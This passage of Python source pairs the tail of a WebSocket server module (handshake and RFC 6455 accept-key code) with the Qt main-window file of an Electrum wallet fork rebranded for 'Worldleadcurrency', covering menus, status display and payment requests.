raise Exception("Message is too big. Consider breaking it into chunks.")
self.request.send(header + payload)
def read_http_headers(self):
headers = {}
# first line should be HTTP GET
http_get = self.rfile.readline().decode().strip()
assert http_get.upper().startswith('GET')
# remaining should be headers
while True:
header = self.rfile.readline().decode().strip()
if not header:
break
head, value = header.split(':', 1)
headers[head.lower().strip()] = value.strip()
return headers
def handshake(self):
headers = self.read_http_headers()
try:
assert headers['upgrade'].lower() == 'websocket'
except AssertionError:
self.keep_alive = False
return
try:
key = headers['sec-websocket-key']
except KeyError:
logger.warning("Client tried to connect but was missing a key")
self.keep_alive = False
return
response = self.make_handshake_response(key)
self.handshake_done = self.request.send(response.encode())
self.valid_client = True
self.server._new_client_(self)
@classmethod
def make_handshake_response(cls, key):
return \
'HTTP/1.1 101 Switching Protocols\r\n'\
'Upgrade: websocket\r\n' \
'Connection: Upgrade\r\n' \
'Sec-WebSocket-Accept: %s\r\n' \
'\r\n' % cls.calculate_response_key(key)
@classmethod
def calculate_response_key(cls, key):
GUID = '258EAFA5-E914-47DA-95CA-C5AB0DC85B11'
hash = sha1(key.encode() + GUID.encode())
response_key = b64encode(hash.digest()).strip()
return response_key.decode('ASCII')
def finish(self):
self.server._client_left_(self)
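# Illustrative sanity check (not part of the original module): section 1.3 of RFC 6455 gives a
# sample handshake in which the client key 'dGhlIHNhbXBsZSBub25jZQ==' must yield the accept
# value 's3pPLMBiTxaQ9kYGzzhZRbK+xOo='. calculate_response_key() above implements exactly that
# SHA-1 + base64 construction, so the known pair can be used to verify it.
def _demo_handshake_accept_key():
    accept = WebSocketHandler.calculate_response_key('dGhlIHNhbXBsZSBub25jZQ==')
    return accept == 's3pPLMBiTxaQ9kYGzzhZRbK+xOo='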
def encode_to_UTF8(data):
try:
return data.encode('UTF-8')
except UnicodeEncodeError as e:
logger.error("Could not encode data to UTF-8 -- %s" % e)
return False
except Exception as e:
raise(e)
def try_decode_UTF8(data):
try:
return data.decode('utf-8')
except UnicodeDecodeError:
return False
except Exception as e:
raise(e)
|
main_window.py
|
#!/usr/bin/env python
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2012 thomasv@gitorious
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import sys, time, threading
import os, json, traceback
import shutil
import socket
import weakref
import webbrowser
import csv
from decimal import Decimal
import base64
from functools import partial
import PyQt4
from PyQt4.QtGui import *
from PyQt4.QtCore import *
import PyQt4.QtCore as QtCore
import icons_rc
from electrum.bitcoin import COIN, is_valid, TYPE_ADDRESS
from electrum.plugins import run_hook
from electrum.i18n import _
from electrum.util import (block_explorer, block_explorer_info, format_time,
block_explorer_URL, format_satoshis, PrintError,
format_satoshis_plain, NotEnoughFunds, StoreDict,
UserCancelled)
from electrum import Transaction, mnemonic
from electrum import util, bitcoin, commands, coinchooser
from electrum import SimpleConfig, paymentrequest
from electrum.wallet import Wallet, BIP32_RD_Wallet, Multisig_Wallet
from amountedit import BTCAmountEdit, MyLineEdit, BTCkBEdit
from network_dialog import NetworkDialog
from qrcodewidget import QRCodeWidget, QRDialog
from qrtextedit import ShowQRTextEdit
from transaction_dialog import show_transaction
from electrum import ELECTRUM_VERSION
import re
from util import *
class StatusBarButton(QPushButton):
def __init__(self, icon, tooltip, func):
QPushButton.__init__(self, icon, '')
self.setToolTip(tooltip)
self.setFlat(True)
self.setMaximumWidth(25)
self.clicked.connect(self.onPress)
self.func = func
self.setIconSize(QSize(25,25))
def onPress(self, checked=False):
'''Drops the unwanted PyQt4 "checked" argument'''
self.func()
def keyPressEvent(self, e):
if e.key() == QtCore.Qt.Key_Return:
self.func()
from electrum.paymentrequest import PR_UNPAID, PR_PAID, PR_UNKNOWN, PR_EXPIRED
pr_icons = {
PR_UNPAID:":icons/unpaid.png",
PR_PAID:":icons/confirmed.png",
PR_EXPIRED:":icons/expired.png"
}
pr_tooltips = {
PR_UNPAID:_('Pending'),
PR_PAID:_('Paid'),
PR_EXPIRED:_('Expired')
}
expiration_values = [
(_('1 hour'), 60*60),
(_('1 day'), 24*60*60),
(_('1 week'), 7*24*60*60),
(_('Never'), None)
]
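# Illustrative sketch (not part of the original file): save_payment_request() below maps the
# index chosen in the expiry combo box to the matching number of seconds in expiration_values,
# with None meaning the request never expires. The helper name is hypothetical; it mirrors the
# idiom used in save_payment_request() (this module targets Python 2, where map() returns a list).
def _expiration_seconds_for_index(i):
    return map(lambda x: x[1], expiration_values)[i]  # e.g. index 1 ('1 day') -> 86400 seconds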
class ElectrumWindow(QMainWindow, MessageBoxMixin, PrintError):
def __init__(self, gui_object, wallet):
QMainWindow.__init__(self)
self.gui_object = gui_object
self.config = config = gui_object.config
self.network = gui_object.daemon.network
self.invoices = gui_object.invoices
self.contacts = gui_object.contacts
self.tray = gui_object.tray
self.app = gui_object.app
self.cleaned_up = False
self.create_status_bar()
self.need_update = threading.Event()
self.decimal_point = config.get('decimal_point', 5)
self.num_zeros = int(config.get('num_zeros',0))
self.completions = QStringListModel()
self.tabs = tabs = QTabWidget(self)
tabs.addTab(self.create_history_tab(), _('History') )
tabs.addTab(self.create_send_tab(), _('Send') )
tabs.addTab(self.create_receive_tab(), _('Receive') )
tabs.addTab(self.create_addresses_tab(), _('Addresses') )
tabs.addTab(self.create_contacts_tab(), _('Contacts') )
tabs.addTab(self.create_console_tab(), _('Console') )
tabs.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding)
self.setCentralWidget(tabs)
if self.config.get("is_maximized"):
self.showMaximized()
self.setWindowIcon(QIcon(":icons/electrum.png"))
self.init_menubar()
wrtabs = weakref.proxy(tabs)
QShortcut(QKeySequence("Ctrl+W"), self, self.close)
QShortcut(QKeySequence("Ctrl+Q"), self, self.close)
QShortcut(QKeySequence("Ctrl+R"), self, self.update_wallet)
QShortcut(QKeySequence("Ctrl+PgUp"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() - 1)%wrtabs.count()))
QShortcut(QKeySequence("Ctrl+PgDown"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() + 1)%wrtabs.count()))
for i in range(wrtabs.count()):
QShortcut(QKeySequence("Alt+" + str(i + 1)), self, lambda i=i: wrtabs.setCurrentIndex(i))
self.connect(self, QtCore.SIGNAL('payment_request_ok'), self.payment_request_ok)
self.connect(self, QtCore.SIGNAL('payment_request_error'), self.payment_request_error)
self.history_list.setFocus(True)
# network callbacks
if self.network:
self.connect(self, QtCore.SIGNAL('network'), self.on_network_qt)
interests = ['updated', 'new_transaction', 'status',
'banner', 'verified']
# To avoid leaking references to "self" that prevent the
# window from being GC-ed when closed, callbacks should be
# methods of this class only, and specifically not be
# partials, lambdas or methods of subobjects. Hence...
self.network.register_callback(self.on_network, interests)
# set initial message
self.console.showMessage(self.network.banner)
self.payment_request = None
self.checking_accounts = False
self.qr_window = None
self.not_enough_funds = False
self.pluginsdialog = None
self.fetch_alias()
self.require_fee_update = False
self.tx_notifications = []
self.tl_windows = []
self.load_wallet(wallet)
self.connect_slots(gui_object.timer)
def push_top_level_window(self, window):
'''Used for e.g. tx dialog box to ensure new dialogs are appropriately
parented. This used to be done by explicitly providing the parent
window, but that isn't something hardware wallet prompts know.'''
self.tl_windows.append(window)
def pop_top_level_window(self, window):
self.tl_windows.remove(window)
def top_level_window(self):
'''Do the right thing in the presence of tx dialog windows'''
override = self.tl_windows[-1] if self.tl_windows else None
return self.top_level_window_recurse(override)
def diagnostic_name(self):
return "%s/%s" % (PrintError.diagnostic_name(self),
self.wallet.basename() if self.wallet else "None")
def is_hidden(self):
return self.isMinimized() or self.isHidden()
def show_or_hide(self):
if self.is_hidden():
self.bring_to_top()
else:
self.hide()
def bring_to_top(self):
self.show()
self.raise_()
def on_error(self, exc_info):
if not isinstance(exc_info[1], UserCancelled):
traceback.print_exception(*exc_info)
self.show_error(str(exc_info[1]))
def on_network(self, event, *args):
if event == 'updated':
self.need_update.set()
elif event == 'new_transaction':
self.tx_notifications.append(args[0])
elif event in ['status', 'banner', 'verified']:
# Handle in GUI thread
self.emit(QtCore.SIGNAL('network'), event, *args)
else:
self.print_error("unexpected network message:", event, args)
def on_network_qt(self, event, *args):
# Handle a network message in the GUI thread
if event == 'status':
self.update_status()
elif event == 'banner':
self.console.showMessage(args[0])
elif event == 'verified':
self.history_list.update_item(*args)
else:
self.print_error("unexpected network_qt signal:", event, args)
def fetch_alias(self):
self.alias_info = None
alias = self.config.get('alias')
if alias:
alias = str(alias)
def f():
self.alias_info = self.contacts.resolve_openalias(alias)
self.emit(SIGNAL('alias_received'))
t = threading.Thread(target=f)
t.setDaemon(True)
t.start()
def update_account_selector(self):
# account selector
accounts = self.wallet.get_account_names()
self.account_selector.clear()
if len(accounts) > 1:
self.account_selector.addItems([_("All accounts")] + accounts.values())
self.account_selector.setCurrentIndex(0)
self.account_selector.show()
else:
self.account_selector.hide()
def close_wallet(self):
if self.wallet:
self.print_error('close_wallet', self.wallet.storage.path)
self.wallet.storage.put('accounts_expanded', self.accounts_expanded)
run_hook('close_wallet', self.wallet)
def load_wallet(self, wallet):
wallet.thread = TaskThread(self, self.on_error)
self.wallet = wallet
self.update_recently_visited(wallet.storage.path)
self.import_old_contacts()
# address used to create a dummy transaction and estimate transaction fee
self.accounts_expanded = self.wallet.storage.get('accounts_expanded',{})
self.current_account = self.wallet.storage.get("current_account", None)
self.history_list.update()
self.need_update.set()
# Once the GUI has been initialized, check whether there is anything to announce, since the callback may already have fired before the GUI was ready
self.notify_transactions()
# update menus
self.update_new_account_menu()
self.seed_menu.setEnabled(self.wallet.has_seed())
self.mpk_menu.setEnabled(self.wallet.is_deterministic())
self.update_lock_icon()
self.update_buttons_on_seed()
self.update_console()
self.clear_receive_tab()
self.receive_list.update()
self.tabs.show()
try:
self.setGeometry(*self.wallet.storage.get("winpos-qt"))
except:
self.setGeometry(100, 100, 840, 400)
if self.config.get('hide_gui') and self.gui_object.tray.isVisible():
self.hide()
else:
self.show()
self.watching_only_changed()
run_hook('load_wallet', wallet, self)
def watching_only_changed(self):
title = 'Electrum %s - %s' % (self.wallet.electrum_version,
self.wallet.basename())
if self.wallet.is_watching_only():
self.warn_if_watching_only()
title += ' [%s]' % (_('watching only'))
self.setWindowTitle(title)
self.password_menu.setEnabled(self.wallet.can_change_password())
self.import_menu.setVisible(self.wallet.can_import())
self.export_menu.setEnabled(self.wallet.can_export())
def warn_if_watching_only(self):
if self.wallet.is_watching_only():
msg = ' '.join([
_("This wallet is watching-only."),
_("This means you will not be able to spend Worldleadcurrencies with it."),
_("Make sure you own the seed phrase or the private keys, before you request Worldleadcurrencies to be sent to this wallet.")
])
self.show_warning(msg, title=_('Information'))
def import_old_contacts(self):
# backward compatibility: import contacts
old_contacts = self.wallet.storage.get('contacts', [])
if old_contacts:
for k in set(old_contacts):
l = self.wallet.labels.get(k)
if bitcoin.is_address(k) and l:
self.contacts[l] = ('address', k)
self.wallet.storage.put('contacts', None)
def open_wallet(self):
wallet_folder = self.get_wallet_folder()
filename = unicode(QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder))
if not filename:
return
self.gui_object.new_window(filename)
def backup_wallet(self):
path = self.wallet.storage.path
wallet_folder = os.path.dirname(path)
filename = unicode( QFileDialog.getSaveFileName(self, _('Enter a filename for the copy of your wallet'), wallet_folder) )
if not filename:
return
new_path = os.path.join(wallet_folder, filename)
if new_path != path:
try:
shutil.copy2(path, new_path)
self.show_message(_("A copy of your wallet file was created in")+" '%s'" % str(new_path), title=_("Wallet backup created"))
except (IOError, os.error), reason:
self.show_critical(_("Electrum was unable to copy your wallet file to the specified location.") + "\n" + str(reason), title=_("Unable to create backup"))
def update_recently_visited(self, filename):
recent = self.config.get('recently_open', [])
if filename in recent:
recent.remove(filename)
recent.insert(0, filename)
recent = recent[:5]
self.config.set_key('recently_open', recent)
self.recently_visited_menu.clear()
for i, k in enumerate(sorted(recent)):
b = os.path.basename(k)
def loader(k):
return lambda: self.gui_object.new_window(k)
self.recently_visited_menu.addAction(b, loader(k)).setShortcut(QKeySequence("Ctrl+%d"%(i+1)))
self.recently_visited_menu.setEnabled(len(recent))
def get_wallet_folder(self):
return os.path.dirname(os.path.abspath(self.config.get_wallet_path()))
def new_wallet(self):
wallet_folder = self.get_wallet_folder()
i = 1
while True:
filename = "wallet_%d" % i
if filename in os.listdir(wallet_folder):
i += 1
else:
break
filename = line_dialog(self, _('New Wallet'), _('Enter file name')
+ ':', _('OK'), filename)
if not filename:
return
full_path = os.path.join(wallet_folder, filename)
if os.path.exists(full_path):
self.show_critical(_("File exists"))
return
self.gui_object.start_new_window(full_path, None)
def init_menubar(self):
menubar = QMenuBar()
file_menu = menubar.addMenu(_("&File"))
self.recently_visited_menu = file_menu.addMenu(_("&Recently open"))
file_menu.addAction(_("&Open"), self.open_wallet).setShortcut(QKeySequence.Open)
file_menu.addAction(_("&New/Restore"), self.new_wallet).setShortcut(QKeySequence.New)
file_menu.addAction(_("&Save Copy"), self.backup_wallet).setShortcut(QKeySequence.SaveAs)
file_menu.addSeparator()
file_menu.addAction(_("&Quit"), self.close)
wallet_menu = menubar.addMenu(_("&Wallet"))
wallet_menu.addAction(_("&New contact"), self.new_contact_dialog)
self.new_account_menu = wallet_menu.addAction(_("&New account"), self.new_account_dialog)
wallet_menu.addSeparator()
self.password_menu = wallet_menu.addAction(_("&Password"), self.change_password_dialog)
self.seed_menu = wallet_menu.addAction(_("&Seed"), self.show_seed_dialog)
self.mpk_menu = wallet_menu.addAction(_("&Master Public Keys"), self.show_master_public_keys)
wallet_menu.addSeparator()
labels_menu = wallet_menu.addMenu(_("&Labels"))
labels_menu.addAction(_("&Import"), self.do_import_labels)
labels_menu.addAction(_("&Export"), self.do_export_labels)
self.private_keys_menu = wallet_menu.addMenu(_("&Private keys"))
self.private_keys_menu.addAction(_("&Sweep"), self.sweep_key_dialog)
self.import_menu = self.private_keys_menu.addAction(_("&Import"), self.do_import_privkey)
self.export_menu = self.private_keys_menu.addAction(_("&Export"), self.export_privkeys_dialog)
wallet_menu.addAction(_("&Export History"), self.export_history_dialog)
wallet_menu.addAction(_("Search"), self.toggle_search).setShortcut(QKeySequence("Ctrl+S"))
tools_menu = menubar.addMenu(_("&Tools"))
# "Settings"/"Preferences" are reserved menu titles on OS X, so use a different label as a workaround
tools_menu.addAction(_("Electrum preferences") if sys.platform == 'darwin' else _("Preferences"), self.settings_dialog)
tools_menu.addAction(_("&Network"), self.run_network_dialog)
tools_menu.addAction(_("&Plugins"), self.plugins_dialog)
tools_menu.addSeparator()
tools_menu.addAction(_("&Sign/verify message"), self.sign_verify_message)
tools_menu.addAction(_("&Encrypt/decrypt message"), self.encrypt_message)
tools_menu.addSeparator()
paytomany_menu = tools_menu.addAction(_("&Pay to many"), self.paytomany)
raw_transaction_menu = tools_menu.addMenu(_("&Load transaction"))
raw_transaction_menu.addAction(_("&From file"), self.do_process_from_file)
raw_transaction_menu.addAction(_("&From text"), self.do_process_from_text)
raw_transaction_menu.addAction(_("&From the blockchain"), self.do_process_from_txid)
raw_transaction_menu.addAction(_("&From QR code"), self.read_tx_from_qrcode)
self.raw_transaction_menu = raw_transaction_menu
help_menu = menubar.addMenu(_("&Help"))
help_menu.addAction(_("&About"), self.show_about)
help_menu.addAction(_("&Official website"), lambda: webbrowser.open("http://electrum.org"))
help_menu.addSeparator()
help_menu.addAction(_("&Documentation"), lambda: webbrowser.open("http://docs.electrum.org/")).setShortcut(QKeySequence.HelpContents)
help_menu.addAction(_("&Report Bug"), self.show_report_bug)
help_menu.addSeparator()
help_menu.addAction(_("&Donate to server"), self.donate_to_server)
self.setMenuBar(menubar)
def donate_to_server(self):
if self.network.is_connected():
d = self.network.get_donation_address()
host = self.network.get_parameters()[0]
self.pay_to_URI('worldleadcurrency:%s?message=donation for %s'%(d, host))
def show_about(self):
QMessageBox.about(self, "Electrum",
_("Version")+" %s" % (self.wallet.electrum_version) + "\n\n" + _("Electrum's focus is speed, with low resource usage and simplifying Worldleadcurrency. You do not need to perform regular backups, because your wallet can be recovered from a secret phrase that you can memorize or write on paper. Startup times are instant because it operates in conjunction with high-performance servers that handle the most complicated parts of the Worldleadcurrency system."))
def show_report_bug(self):
msg = ' '.join([
_("Please report any bugs as issues on github:<br/>"),
"<a href=\"https://github.com/spesmilo/electrum/issues\">https://github.com/spesmilo/electrum/issues</a><br/><br/>",
_("Before reporting a bug, upgrade to the most recent version of Electrum (latest release or git HEAD), and include the version number in your report."),
_("Try to explain not only what the bug is, but how it occurs.")
])
self.show_message(msg, title="Electrum - " + _("Reporting Bugs"))
def notify_transactions(self):
if not self.network or not self.network.is_connected():
return
self.print_error("Notifying GUI")
if len(self.tx_notifications) > 0:
# Combine the transactions if there are three or more
tx_amount = len(self.tx_notifications)
if(tx_amount >= 3):
total_amount = 0
for tx in self.tx_notifications:
is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx)
if(v > 0):
total_amount += v
self.notify(_("%(txs)s new transactions received. Total amount received in the new transactions %(amount)s") \
% { 'txs' : tx_amount, 'amount' : self.format_amount_and_units(total_amount)})
self.tx_notifications = []
else:
for tx in self.tx_notifications:
if tx:
self.tx_notifications.remove(tx)
is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx)
if(v > 0):
self.notify(_("New transaction received. %(amount)s") % { 'amount' : self.format_amount_and_units(v)})
def notify(self, message):
if self.tray:
self.tray.showMessage("Electrum", message, QSystemTrayIcon.Information, 20000)
# custom wrappers for getOpenFileName and getSaveFileName, that remember the path selected by the user
def getOpenFileName(self, title, filter = ""):
directory = self.config.get('io_dir', unicode(os.path.expanduser('~')))
fileName = unicode( QFileDialog.getOpenFileName(self, title, directory, filter) )
if fileName and directory != os.path.dirname(fileName):
self.config.set_key('io_dir', os.path.dirname(fileName), True)
return fileName
def getSaveFileName(self, title, filename, filter = ""):
directory = self.config.get('io_dir', unicode(os.path.expanduser('~')))
path = os.path.join( directory, filename )
fileName = unicode( QFileDialog.getSaveFileName(self, title, path, filter) )
if fileName and directory != os.path.dirname(fileName):
self.config.set_key('io_dir', os.path.dirname(fileName), True)
return fileName
def connect_slots(self, sender):
self.connect(sender, QtCore.SIGNAL('timersignal'), self.timer_actions)
def timer_actions(self):
# Note this runs in the GUI thread
if self.need_update.is_set():
self.need_update.clear()
self.update_wallet()
# resolve aliases
self.payto_e.resolve()
# update fee
if self.require_fee_update:
self.do_update_fee()
self.require_fee_update = False
def format_amount(self, x, is_diff=False, whitespaces=False):
return format_satoshis(x, is_diff, self.num_zeros, self.decimal_point, whitespaces)
def format_amount_and_units(self, amount):
text = self.format_amount(amount) + ' '+ self.base_unit()
x = run_hook('format_amount_and_units', amount)
if text and x:
text += ' (%s)'%x
return text
def get_decimal_point(self):
return self.decimal_point
def base_unit(self):
assert self.decimal_point in [2, 5, 8]
if self.decimal_point == 2:
return 'µWLC'
if self.decimal_point == 5:
return 'mWLC'
if self.decimal_point == 8:
return 'WLC'
raise Exception('Unknown base unit')
def update_status(self):
if not self.wallet:
return
if self.network is None or not self.network.is_running():
text = _("Offline")
icon = QIcon(":icons/status_disconnected.png")
elif self.network.is_connected():
server_height = self.network.get_server_height()
server_lag = self.network.get_local_height() - server_height
# Server height can be 0 after switching to a new server
# until we get a headers subscription request response.
# Display the synchronizing message in that case.
if not self.wallet.up_to_date or server_height == 0:
text = _("Synchronizing...")
icon = QIcon(":icons/status_waiting.png")
elif server_lag > 1:
text = _("Server is lagging (%d blocks)"%server_lag)
icon = QIcon(":icons/status_lagging.png")
else:
use_height = self.network.get_local_height()
c, u, x = self.wallet.get_account_balance(self.current_account, use_height)
text = _("Balance" ) + ": %s "%(self.format_amount_and_units(c))
if u:
text += " [%s unconfirmed]"%(self.format_amount(u, True).strip())
if x:
text += " [%s unmatured]"%(self.format_amount(x, True).strip())
# append fiat balance and price from exchange rate plugin
rate = run_hook('get_fiat_status_text', c + u + x)
if rate:
text += rate
icon = QIcon(":icons/status_connected.png")
else:
text = _("Not connected")
icon = QIcon(":icons/status_disconnected.png")
self.tray.setToolTip("%s (%s)" % (text, self.wallet.basename()))
self.balance_label.setText(text)
self.status_button.setIcon( icon )
def update_wallet(self):
self.update_status()
if self.wallet.up_to_date or not self.network or not self.network.is_connected():
self.update_tabs()
if self.wallet.up_to_date:
self.check_next_account()
def update_tabs(self):
self.history_list.update()
self.receive_list.update()
self.address_list.update()
self.contacts_list.update()
self.invoices_list.update()
self.update_completions()
def create_history_tab(self):
from history_widget import HistoryWidget
self.history_list = l = HistoryWidget(self)
return l
def show_address(self, addr):
import address_dialog
d = address_dialog.AddressDialog(self, addr)
d.exec_()
def show_transaction(self, tx, tx_desc = None):
'''tx_desc is set only for txs created in the Send tab'''
show_transaction(tx, self, tx_desc)
def create_receive_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.receive_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
self.receive_address_e = ButtonsLineEdit()
self.receive_address_e.addCopyButton(self.app)
self.receive_address_e.setReadOnly(True)
msg = _('Worldleadcurrency address where the payment should be received. Note that each payment request uses a different Worldleadcurrency address.')
self.receive_address_label = HelpLabel(_('Receiving address'), msg)
self.receive_address_e.textChanged.connect(self.update_receive_qr)
self.receive_address_e.setFocusPolicy(Qt.NoFocus)
grid.addWidget(self.receive_address_label, 0, 0)
grid.addWidget(self.receive_address_e, 0, 1, 1, -1)
self.receive_message_e = QLineEdit()
grid.addWidget(QLabel(_('Description')), 1, 0)
grid.addWidget(self.receive_message_e, 1, 1, 1, -1)
self.receive_message_e.textChanged.connect(self.update_receive_qr)
self.receive_amount_e = BTCAmountEdit(self.get_decimal_point)
grid.addWidget(QLabel(_('Requested amount')), 2, 0)
grid.addWidget(self.receive_amount_e, 2, 1)
self.receive_amount_e.textChanged.connect(self.update_receive_qr)
self.expires_combo = QComboBox()
self.expires_combo.addItems(map(lambda x:x[0], expiration_values))
self.expires_combo.setCurrentIndex(1)
self.expires_combo.setFixedWidth(self.receive_amount_e.width())
msg = ' '.join([
_('Expiration date of your request.'),
_('This information is seen by the recipient if you send them a signed payment request.'),
_('Expired requests have to be deleted manually from your list, in order to free the corresponding Worldleadcurrency addresses.'),
_('The Worldleadcurrency address never expires and will always be part of this Electrum wallet.'),
])
grid.addWidget(HelpLabel(_('Request expires'), msg), 3, 0)
grid.addWidget(self.expires_combo, 3, 1)
self.expires_label = QLineEdit('')
self.expires_label.setReadOnly(1)
self.expires_label.setFocusPolicy(Qt.NoFocus)
self.expires_label.hide()
grid.addWidget(self.expires_label, 3, 1)
self.save_request_button = QPushButton(_('Save'))
self.save_request_button.clicked.connect(self.save_payment_request)
self.new_request_button = QPushButton(_('New'))
self.new_request_button.clicked.connect(self.new_payment_request)
self.receive_qr = QRCodeWidget(fixedSize=200)
self.receive_qr.mouseReleaseEvent = lambda x: self.toggle_qr_window()
self.receive_qr.enterEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.PointingHandCursor))
self.receive_qr.leaveEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.ArrowCursor))
self.receive_buttons = buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.save_request_button)
buttons.addWidget(self.new_request_button)
grid.addLayout(buttons, 4, 1, 1, 2)
self.receive_requests_label = QLabel(_('Requests'))
self.receive_list = MyTreeWidget(self, self.receive_list_menu, [_('Date'), _('Account'), _('Address'), '', _('Description'), _('Amount'), _('Status')], 4)
self.receive_list.currentItemChanged.connect(self.receive_item_changed)
self.receive_list.itemClicked.connect(self.receive_item_changed)
self.receive_list.setSortingEnabled(True)
self.receive_list.setColumnWidth(0, 180)
self.receive_list.hideColumn(1)
self.receive_list.hideColumn(2)
self.receive_list.on_update = self.update_receive_tab
# layout
vbox_g = QVBoxLayout()
vbox_g.addLayout(grid)
vbox_g.addStretch()
hbox = QHBoxLayout()
hbox.addLayout(vbox_g)
hbox.addWidget(self.receive_qr)
w = QWidget()
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.receive_requests_label)
vbox.addWidget(self.receive_list)
vbox.setStretchFactor(self.receive_list, 1000)
return w
def receive_item_changed(self, item):
if item is None:
return
if not self.receive_list.isItemSelected(item):
return
addr = str(item.text(2))
req = self.wallet.receive_requests[addr]
expires = util.age(req['time'] + req['exp']) if req.get('exp') else _('Never')
amount = req['amount']
message = self.wallet.labels.get(addr, '')
self.receive_address_e.setText(addr)
self.receive_message_e.setText(message)
self.receive_amount_e.setAmount(amount)
self.expires_combo.hide()
self.expires_label.show()
self.expires_label.setText(expires)
self.new_request_button.setEnabled(True)
def delete_payment_request(self, item):
addr = str(item.text(2))
self.wallet.remove_payment_request(addr, self.config)
self.receive_list.update()
self.clear_receive_tab()
def get_request_URI(self, addr):
req = self.wallet.receive_requests[addr]
message = self.wallet.labels.get(addr, '')
amount = req['amount']
URI = util.create_URI(addr, amount, message)
if req.get('time'):
URI += "&time=%d"%req.get('time')
if req.get('exp'):
URI += "&exp=%d"%req.get('exp')
if req.get('name') and req.get('sig'):
sig = req.get('sig').decode('hex')
sig = bitcoin.base_encode(sig, base=58)
URI += "&name=" + req['name'] + "&sig="+sig
return str(URI)
def receive_list_menu(self, position):
item = self.receive_list.itemAt(position)
addr = str(item.text(2))
req = self.wallet.receive_requests[addr]
menu = QMenu(self)
menu.addAction(_("Copy Address"), lambda: self.view_and_paste(_('Address'), '', addr))
menu.addAction(_("Copy URI"), lambda: self.view_and_paste('URI', '', self.get_request_URI(addr)))
menu.addAction(_("Save as BIP70 file"), lambda: self.export_payment_request(addr))
menu.addAction(_("Delete"), lambda: self.delete_payment_request(item))
run_hook('receive_list_menu', menu, addr)
menu.exec_(self.receive_list.viewport().mapToGlobal(position))
def sign_payment_request(self, addr):
alias = self.config.get('alias')
alias_privkey = None
if alias and self.alias_info:
alias_addr, alias_name, validated = self.alias_info
if alias_addr:
if self.wallet.is_mine(alias_addr):
msg = _('This payment request will be signed.') + '\n' + _('Please enter your password')
password = self.password_dialog(msg)
if password:
try:
self.wallet.sign_payment_request(addr, alias, alias_addr, password)
except Exception as e:
self.show_error(str(e))
return
else:
return
else:
return
def save_payment_request(self):
addr = str(self.receive_address_e.text())
amount = self.receive_amount_e.get_amount()
message = unicode(self.receive_message_e.text())
if not message and not amount:
self.show_error(_('No message or amount'))
return False
i = self.expires_combo.currentIndex()
expiration = map(lambda x: x[1], expiration_values)[i]
req = self.wallet.make_payment_request(addr, amount, message, expiration)
self.wallet.add_payment_request(req, self.config)
self.sign_payment_request(addr)
self.receive_list.update()
self.address_list.update()
self.save_request_button.setEnabled(False)
def view_and_paste(self, title, msg, data):
dialog = WindowModalDialog(self, title)
vbox = QVBoxLayout()
label = QLabel(msg)
label.setWordWrap(True)
vbox.addWidget(label)
pr_e = ShowQRTextEdit(text=data)
vbox.addWidget(pr_e)
vbox.addLayout(Buttons(CopyCloseButton(pr_e.text, self.app, dialog)))
dialog.setLayout(vbox)
dialog.exec_()
def export_payment_request(self, addr):
r = self.wallet.receive_requests.get(addr)
pr = paymentrequest.serialize_request(r).SerializeToString()
name = r['id'] + '.bip70'
fileName = self.getSaveFileName(_("Select where to save your payment request"), name, "*.bip70")
if fileName:
with open(fileName, "wb+") as f:
f.write(str(pr))
self.show_message(_("Request saved successfully"))
self.saved = True
def new_payment_request(self):
addr = self.wallet.get_unused_address(self.current_account)
if addr is None:
if isinstance(self.wallet, Imported_Wallet):
self.show_message(_('No more addresses in your wallet.'))
return
if not self.question(_("Warning: The next address will not be recovered automatically if you restore your wallet from seed; you may need to add it manually.\n\nThis occurs because you have too many unused addresses in your wallet. To avoid this situation, use the existing addresses first.\n\nCreate anyway?")):
return
addr = self.wallet.create_new_address(self.current_account, False)
self.set_receive_address(addr)
self.expires_label.hide()
self.expires_combo.show()
self.new_request_button.setEnabled(False)
self.receive_message_e.setFocus(1)
def set_receive_address(self, addr):
self.receive_address_e.setText(addr)
self.receive_message_e.setText('')
self.receive_amount_e.setAmount(None)
def clear_receive_tab(self):
addr = self.wallet.get_unused_address(self.current_account)
self.receive_address_e.setText(addr if addr else '')
self.receive_message_e.setText('')
self.receive_amount_e.setAmount(None)
self.expires_label.hide()
self.expires_combo.show()
def toggle_qr_window(self):
import qrwindow
if not self.qr_window:
self.qr_window = qrwindow.QR_Window(self)
self.qr_window.setVisible(True)
self.qr_window_geometry = self.qr_window.geometry()
else:
if not self.qr_window.isVisible():
self.qr_window.setVisible(True)
self.qr_window.setGeometry(self.qr_window_geometry)
else:
self.qr_window_geometry = self.qr_window.geometry()
self.qr_window.setVisible(False)
self.update_receive_qr()
def receive_at(self, addr):
if not bitcoin.is_address(addr):
return
self.tabs.setCurrentIndex(2)
self.receive_address_e.setText(addr)
